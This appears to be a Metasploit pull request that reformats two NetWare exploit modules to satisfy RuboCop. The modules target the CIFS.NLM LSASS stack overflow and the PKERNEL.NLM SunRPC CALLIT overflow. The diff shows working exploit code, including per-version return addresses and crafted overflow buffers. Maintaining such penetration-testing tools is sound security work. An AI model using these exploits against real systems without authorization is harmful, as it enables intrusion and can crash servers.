### PR TITLE
modules/exploits/netware: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/netware/smb/lsass_cifs.rb
+++ b/modules/exploits/netware/smb/lsass_cifs.rb
@@ -89,8 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     resp = dcerpc.call(0x2c, stb)
     handle, = resp[0, 20]
-    _code, = resp[20, 4].unpack('V')
-    resp[20, 4].unpack('V')
+    _code = resp[20, 4].unpack('V')
 
     name =
       rand_text_alphanumeric(0xa0) +

--- a/modules/exploits/netware/smb/lsass_cifs.rb
+++ b/modules/exploits/netware/smb/lsass_cifs.rb
@@ -9,38 +9,35 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB::Client
 
-
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
-      'Description'    => %q{
-        This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
-        Since the driver runs in the kernel space, a failed exploit attempt can
-        cause the OS to reboot.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
+          Since the driver runs in the kernel space, a failed exploit attempt can
+          cause the OS to reboot.
+        },
+        'Author' => [
           'toto',
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2005-2852' ],
           [ 'OSVDB', '12790' ]
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 400,
-          'BadChars' => "\x00",
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 400,
+          'BadChars' => "\x00"
         },
-      'Platform'       => 'netware',
-      'Targets'        =>
-        [
+        'Platform' => 'netware',
+        'Targets' => [
           # NetWare SP can be found in the SNMP version :
           # 5.70.07 -> NetWare 6.5 (5.70) SP7 (07)
 
-          [ 'VMware',   { 'Ret' => 0x000f142b } ],
+          [ 'VMware', { 'Ret' => 0x000f142b } ],
           [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
           [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
           [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
@@ -48,23 +45,30 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
           [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
         ],
-
-      'DisclosureDate' => '2007-01-21'))
+        'Notes' => {
+          'Stability' => [ CRASH_OS_RESTARTS ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        },
+        'DisclosureDate' => '2007-01-21'
+      )
+    )
 
     register_options(
       [
-        OptString.new('SMBPIPE', [ true,  "The pipe name to use (LSARPC)", 'lsarpc'])
-      ])
+        OptString.new('SMBPIPE', [true, 'The pipe name to use (LSARPC)', 'lsarpc'])
+      ]
+    )
 
+    deregister_options('DCERPC::fake_bind_multi')
   end
 
   def exploit
-
     # Force multi-bind off (netware doesn't support it)
     datastore['DCERPC::fake_bind_multi'] = false
 
-    connect()
-    smb_login()
+    connect
+    smb_login
 
     handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
 
@@ -84,8 +88,9 @@ class MetasploitModule < Msf::Exploit::Remote
       NDR.long(0x000f0fff)
 
     resp = dcerpc.call(0x2c, stb)
-    handle, = resp[0,20]
-    code, = resp[20, 4].unpack('V')
+    handle, = resp[0, 20]
+    _code, = resp[20, 4].unpack('V')
+    resp[20, 4].unpack('V')
 
     name =
       rand_text_alphanumeric(0xa0) +
@@ -96,26 +101,23 @@ class MetasploitModule < Msf::Exploit::Remote
       handle +
       NDR.long(1) +
       NDR.long(1) +
-
       NDR.short(name.length) +
       NDR.short(name.length) +
       NDR.long(rand(0xffffffff)) +
-
       NDR.UnicodeConformantVaryingStringPreBuilt(name) +
-
       NDR.long(0) +
       NDR.long(0) +
       NDR.long(1) +
       NDR.long(0)
 
-    print_status("Calling the vulnerable function ...")
+    print_status('Calling the vulnerable function ...')
 
     begin
       dcerpc.call(0x0E, stb)
-    rescue
+    rescue StandardError
+      # DCERPC call may fail, this is expected
     end
 
-    # Cleanup
     handler
     disconnect
   end

--- a/modules/exploits/netware/sunrpc/pkernel_callit.rb
+++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb
@@ -9,31 +9,30 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Udp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
-      'Description'    => %q{
-        This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
-        PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
-        The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
-        cause the operating system to reboot.
-      },
-      'Author'         => [ 'pahtzo', ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
+          PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
+          The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
+          cause the operating system to reboot.
+        },
+        'Author' => [ 'pahtzo', ],
+        'License' => MSF_LICENSE,
+        'References' => [
           # There is no CVE for this vulnerability
           [ 'BID', '36564' ],
           [ 'OSVDB', '58447' ],
           [ 'ZDI', '09-067' ],
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 2020,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 2020
         },
-      'Platform'       => 'netware',
-      'Targets'        =>
-        [
+        'Platform' => 'netware',
+        'Targets' => [
           # NetWare SP and PKERNEL.NLM version can be found in SNMP:
           # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
           # sysDescr.0 = STRING: Novell NetWare 5.70.08  October 3, 2008
@@ -46,8 +45,14 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
           [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
         ],
-
-      'DisclosureDate' => '2009-09-30'))
+        'Notes' => {
+          'Stability' => [ CRASH_OS_RESTARTS ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        },
+        'DisclosureDate' => '2009-09-30'
+      )
+    )
 
     register_options([Opt::RPORT(111)])
   end
@@ -55,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect_udp
 
-    buf =  [rand(0xffffffff)].pack('N') # XID
+    buf = [rand(0xffffffff)].pack('N') # XID
     buf << [0].pack('N')                # Message Type: Call (0)
     buf << [2].pack('N')                # RPC Version: 2
     buf << [100000].pack('N')           # Program: Portmap (100000)
@@ -74,9 +79,9 @@ class MetasploitModule < Msf::Exploit::Remote
     buf << [target.ret].pack('V')       # addr. of push esp - ret
     buf << payload.encoded              #
 
-#        print_status("payload space #{payload_space()}...")
-#        print_status("payload len #{payload.encoded.length}...")
-#        print_status("total buf len #{buf.length}...")
+    # print_status("payload space #{payload_space()}...")
+    # print_status("payload len #{payload.encoded.length}...")
+    # print_status("total buf len #{buf.length}...")
 
     print_status("Trying target #{target.name}...")
 


### PR DESCRIPTION
Most violations were resolved with `rubocop -a`, except missing notes.

A violation due to a silently ignored error was resolved manually.

https://github.com/rapid7/metasploit-framework/blob/e09d23715b200354a047a8630882ad329dbfdeff/modules/exploits/netware/smb/lsass_cifs.rb#L113-L116

A lot of DCERPC modules `rescue` using a pattern similar to the following:

```ruby
rescue Rex::Proto::DCERPC::Exceptions::NoResponse, ::EOFError
  print_good('Server did not respond, this is expected')
```

or ignore `NoResponse` explicitly:

```ruby
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
```

Without testing the module, it is impossible to know what the intention of the author was here; however, given that all errors are silently ignored it is likely that the intention is to proceed regardless of DCERPC errors. Whether errors were expected is unknown. For this reason, I've updated the module with a code comment, rather than printing a message.




